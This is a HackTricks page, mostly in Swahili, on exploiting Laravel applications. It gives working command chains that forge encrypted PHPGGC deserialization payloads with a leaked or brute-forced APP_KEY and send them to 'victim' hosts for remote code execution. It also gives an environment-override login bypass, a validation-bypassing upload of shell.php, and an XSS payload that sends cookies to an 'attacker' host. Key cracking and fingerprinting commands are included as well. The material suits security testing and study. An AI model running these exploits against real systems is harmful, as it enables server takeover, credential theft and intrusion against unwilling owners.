Laravel

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Laravel SQLInjection

Read information about this here: https://stitcher.io/blog/unsafe-sql-functions-in-laravel

APP_KEY & Ndani ya Encryption (Laravel >=5.6)

Laravel inatumia AES-256-CBC (au GCM) pamoja na uadilifu wa HMAC kupitia Illuminate\Encryption\Encrypter. Ciphertext ghafi ambayo hatimaye inayotumwa kwa mteja ni Base64 ya JSON object kama:

{
"iv"   : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
"tag"  : ""                 // only used for AEAD ciphers (GCM)
}

encrypt($value, $serialize=true) itafanya serialize() ya plaintext kwa default, wakati decrypt($payload, $unserialize=true) ita-unserialize() moja kwa moja kwenye thamani iliyofumbuliwa. Kwa hivyo mdukuzi yeyote anayejua siri ya 32-byte APP_KEY anaweza kutengeneza encrypted PHP serialized object na kupata RCE kupitia magic methods (__wakeup, __destruct, …).

Minimal PoC (framework ≥9.x):

use Illuminate\Support\Facades\Crypt;

$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste

Ingiza mfuatano uliotengenezwa ndani ya sink yoyote dhaifu ya decrypt() (route param, cookie, session, …).

laravel-crypto-killer 🧨

laravel-crypto-killer inaotomatisha mchakato mzima na inaongeza hali rahisi ya bruteforce:

# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"

# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>

# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt

The script transparently supports both CBC and GCM payloads and re-generates the HMAC/tag field.

Mifano hatarishi ya ulimwengu halisi

Mtiririko wa exploitation daima ni:

1. Pata au brute-force APP_KEY ya 32-byte.
2. Tengeneza gadget chain kwa kutumia PHPGGC (kwa mfano Laravel/RCE13, Laravel/RCE9 au Laravel/RCE15).
3. Fichamisha gadget iliyoserializwa kwa kutumia laravel_crypto_killer.py na APP_KEY iliyopatikana.
4. Tuma ciphertext kwenye sinki yenye udhaifu ya decrypt() (route parameter, cookie, session …) ili kusababisha RCE.

Hapo chini kuna mistari fupi za amri zinazothibitisha njia kamili ya mashambulizi kwa kila CVE halisi iliyotajwa hapo juu:

# Invoice Ninja ≤5 – /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"

# Snipe-IT ≤6 – XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

# Crater – cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

Mass APP_KEY discovery via cookie brute-force

Kwa sababu kila jibu jipya la Laravel linaset angalau cookie 1 iliyofichwa (XSRF-TOKEN na kawaida laravel_session), public internet scanners (Shodan, Censys, …) leak millions of ciphertexts ambazo zinaweza kushambuliwa offline.

Matokeo muhimu ya utafiti uliochapishwa na Synacktiv (2024-2025):

• Dataset July 2024 » 580 k tokens, 3.99 % keys cracked (≈23 k)
• Dataset May 2025 » 625 k tokens, 3.56 % keys cracked

• 1 000 servers bado wapo hatarini kwa legacy CVE-2018-15133 kwa sababu tokens zina mfululizo wa data zilizoseriali moja kwa moja.

• Matumizi makubwa ya APP_KEY sawa – Top-10 APP_KEYs ni defaults zilizohard-coded zinazotolewa na templates za kibiashara za Laravel (UltimatePOS, Invoice Ninja, XPanel, …).

Zana binafsi ya Go nounours inaongeza AES-CBC/GCM bruteforce throughput hadi ~1.5 billion tries/s, ikipunguza full dataset cracking hadi <2 minutes.

CVE-2024-52301 – HTTP argv/env override → auth bypass

Wakati register_argc_argv=On ya PHP (kawaida kwenye distros nyingi), PHP inaonyesha array ya argv kwa HTTP requests inayotokana na query string. Toleo za hivi karibuni za Laravel zilichanganua hizi “CLI-like” args na kuheshimu --env=<value> wakati wa runtime. Hii inaruhusu kubadilisha environment ya framework kwa current HTTP request kwa kuiongeza tu kwenye URL yoyote:

• Quick check:

• Tembelea https://target/?--env=local au string yoyote na tazama mabadiliko yanayotegemea environment (debug banners, footers, verbose errors). Ikiwa string inaonekana reflected, override inafanya kazi.

• Mfano wa athari (business logic inayomwamini env maalumu):

• Ikiwa app ina matawi kama if (app()->environment('preprod')) { /* bypass auth */ }, unaweza kuingia bila kredenshiali halali kwa kutuma POST ya login kwa:

• POST /login?--env=preprod

• Vidokezo:

• Inafanya kazi kwa request moja, hakuna persistence.

• Inahitaji register_argc_argv=On na version ya Laravel yenye udhaifu inayosoma argv kwa HTTP.

• Primitive yenye msaada kutolewa kwa kupata verbose errors katika env za “debug” au kuchochea path za code zilizofungwa kwa environment.

• Mitigations:

• Zima register_argc_argv kwa PHP-FPM/Apache.

• Update Laravel ili isilishe argv kwenye HTTP requests na ondoa assumptions zozote za kuamini app()->environment() kwenye routes za production.

Minimal exploitation flow (Burp):

POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
...
email=a@b.c&password=whatever&remember=0xdf

CVE-2025-27515 – Kupita-kando kwa uidhinishaji wa faili kwa wildcard (files.*)

Laravel 10.0–10.48.28, 11.0.0–11.44.0 and 12.0.0–12.1.0 inaruhusu crafted multipart requests kupitisha kabisa sheria yoyote iliyofungwa kwa files.* / images.*. Parser inayopanua wildcard keys inaweza kuchanganywa na placeholders zinazoendeshwa na mshambuliaji (kwa mfano, kutangulia kujaza segments za __asterisk__), hivyo framework ingeunda objects za UploadedFile bila kamwe kuendesha image, mimes, dimensions, max, n.k. Mara blob ya uharibifu inapofika katika Storage::putFile* unaweza pivot kwenda kwa yoyote ya file-upload primitives zilizoorodheshwa tayari katika HackTricks (web shells, log poisoning, signed job deserialization, …).

Kutafuta muundo

• Statiki: rg -n "files\\.\*" -g"*.php" app/ au angalia madarasa ya FormRequest kwa rules() zinazorejesha arrays zenye files.*.
• Dinamiki: ganisha Illuminate\Validation\Validator::validate() kwa kutumia Xdebug au Laravel Telescope katika kabla ya uzalishaji ili kurekodi kila request inayogonga rule dhaifu.
• Ukaguzi wa middleware/route: endpoints zinazokusanya faili nyingi (avatar importers, document portals, drag-n-drop components) kawaida huamini files.*.

Mtiririko wa matumizi kwa vitendo

1. Rekodi upload halali na uirudie katika Burp Repeater.
2. Nakili sehemu ile ile lakini badilisha jina la field ili liwe tayari na placeholder tokens (kwa mfano, files[0][__asterisk__payload]) au weka array nyingine (files[0][alt][0]). Katika builds zilizo dhaifu, sehemu ya pili haithibitishwi kabisa lakini bado inakuwa entry ya UploadedFile.
3. Elekeza faili iliyotengenezwa kwa payload ya PHP (shell.php, .phar, polyglot) na kulazimisha application kuihifadhi kwenye disk inayoweza kufikiwa kwa wavuti (kwa kawaida public/ mara php artisan storage:link inapoamilishwa).

curl -sk https://target/upload \
-F 'files[0]=@ok.png;type=image/png' \
-F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
-F 'description=lorem'

Keep fuzzing key names (files.__dot__0, files[0][0], files[0][uuid] …) mpaka upate moja inayompita validator lakini bado inaandikwa kwenye diski; matoleo yaliyopatiki yanakata majina haya ya attribute yaliyotengenezwa mara moja.

Pakiti za ekosistimu zenye udhaifu zinazostahili kuunganisha (2025)

CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (inaathiri auth0/laravel-auth0)

Ikiwa mradi unatumia Auth0 login na backend ya default CookieStore na auth0/auth0-php < 8.14.0, GCM tag kwenye auth0 session cookie ni fupi vya kutosha kufanywa brute-force offline. Capture cookie, badilisha JSON payload (mfano, seti "sub":"auth0|admin" na app_metadata.roles), brute-force tag, kisha replay ili kupata Laravel guard session halali. Vidokezo vya haraka: composer.lock inaonyesha auth0/auth0-php <8.14.0 na .env ina AUTH0_SESSION_STORAGE=cookie.

CVE-2025-48490 – lomkit/laravel-rest-api validation override

Pakitii lomkit/laravel-rest-api kabla ya 2.13.0 inachanganya per-action rules kwa njia isiyo sahihi: definitions za baadaye zinaandika zile za awali kwa attribute ile ile, kuruhusu fields zilizotengenezwa kuepuka validation (mfano, kuandika tena filter rules wakati wa action ya update), ikisababisha mass assignment au SQL-ish filters zisizothibitishwa. Ukaguzi wa vitendo:

• composer.lock inaorodhesha lomkit/laravel-rest-api <2.13.0.
• /_rest/users?filters[0][column]=password&filters[0][operator]== inakubaliwa badala ya kukataliwa, ikionyesha filter validation iliepukwa.

Mbinu za Laravel

Hali ya debugging

Ikiwa Laravel iko katika debugging mode utaweza kupata code na sensitive data.
Kwa mfano http://127.0.0.1:8000/profiles:

Hii kawaida inahitajika kwa exploiting CVEs nyingine za Laravel RCE.

CVE-2024-13918 / CVE-2024-13919 – reflected XSS katika ukurasa za Whoops debug

• Waliathiriwa: Laravel 11.9.0–11.35.1 na APP_DEBUG=true (kando au kulazimishwa kupitia env overrides zisizokusudiwa kama CVE-2024-52301).
• Primitive: kila exception isiyotumika (uncaught) inayotengenezwa na Whoops inaonyesha sehemu za request/route bila HTML encoding, kwa hivyo kuingiza <img src> / <script> katika route au parameter ya request husababisha stored-on-response XSS kabla ya authentication.
• Impact: steal XSRF-TOKEN, leak stack traces with secrets, kufungua pivot ya browser-kuweka kumfikia _ignition/execute-solution katika sessions za waathiriwa, au kuunganisha na dashboards zisizo na password zinazotegemea cookies.

Minimal PoC:

// blade/web.php (attacker-controlled param reflected)
Route::get('/boom/{id}', function ($id) {
abort(500);
});

curl -sk "https://target/boom/%3Cscript%3Efetch('//attacker/x?c='+document.cookie)%3C/script%3E"

Hata ikiwa debug mode kwa kawaida imezimwa, kulazimisha kosa kwa kutumia background jobs au queue workers na kuchunguza endpoint _ignition/health-check mara nyingi hufichua staging hosts ambazo bado zinaonyesha mnyororo huu.

Fingerprinting & exposed dev endpoints

Ukaguzi wa haraka kubaini stack ya Laravel na zana za dev hatari zilizo wazi katika production:

• /_ignition/health-check → Ignition present (debug tool used by CVE-2021-3129). Ikiwa inafikika bila uthibitisho, app inaweza kuwa katika debug au imepangwa vibaya.
• /_debugbar → Laravel Debugbar assets; mara nyingi inaonyesha debug mode.
• /telescope → Laravel Telescope (dev monitor). Ikiwa ni ya umma, tarajia kufichuka kwa taarifa nyingi na hatua zinazowezekana.
• /horizon → Queue dashboard; ufichuzi wa version na wakati mwingine vitendo vilivyolindwa na CSRF.
• X-Powered-By, cookies XSRF-TOKEN and laravel_session, and Blade error pages pia husaidia fingerprint.

# Nuclei quick probe
nuclei -nt -u https://target -tags laravel -rl 30
# Manual spot checks
for p in _ignition/health-check _debugbar telescope horizon; do curl -sk https://target/$p | head -n1; done

.env

Laravel huweka APP inayotumika encrypt cookies na credentials nyingine ndani ya faili inayoitwa .env ambayo inaweza kupatikana kwa kutumia path traversal chini ya: /../.env

Laravel pia itaonyesha taarifa hizi ndani ya debug page (inayoonekana wakati Laravel inapata error na imewezeshwa).

Kutumia secret APP_KEY ya Laravel unaweza decrypt na re-encrypt cookies:

Decrypt Cookie

</details>

### Laravel Deserialization RCE

Matoleo zilizo hatarini: 5.5.40 and 5.6.x through 5.6.29 ([https://www.cvedetails.com/cve/CVE-2018-15133/](https://www.cvedetails.com/cve/CVE-2018-15133/))

Taarifa kuhusu deserialization vulnerability inapatikana hapa: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)

Unaweza kujaribu na kui-exploit kwa kutumia [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Au pia unaweza kui-exploit kwa metasploit: `use unix/http/laravel_token_unserialize_exec`

### CVE-2021-3129

Deserialization nyingine: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)



## Marejeleo
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2024-52301 advisory – Laravel argv env detection](https://github.com/advisories/GHSA-gv7v-rgg6-548h)
* [CVE-2024-52301 PoC – register_argc_argv HTTP argv → --env override](https://github.com/Nyamort/CVE-2024-52301)
* [0xdf – HTB Environment (CVE‑2024‑52301 env override → auth bypass)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
* [GHSA-78fx-h6xr-vch4 – Laravel wildcard file validation bypass (CVE-2025-27515)](https://github.com/laravel/framework/security/advisories/GHSA-78fx-h6xr-vch4)
* [SBA Research – CVE-2024-13919 reflected XSS in debug-mode error page](http://www.openwall.com/lists/oss-security/2025/03/10/4)
* [CVE-2025-47275 – Auth0-PHP CookieStore tag brute-force (laravel-auth0)](https://www.wiz.io/vulnerability-database/cve/cve-2025-47275)
* [CVE-2025-48490 – lomkit/laravel-rest-api validation override](https://advisories.gitlab.com/pkg/composer/lomkit/laravel-rest-api/CVE-2025-48490/)


> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>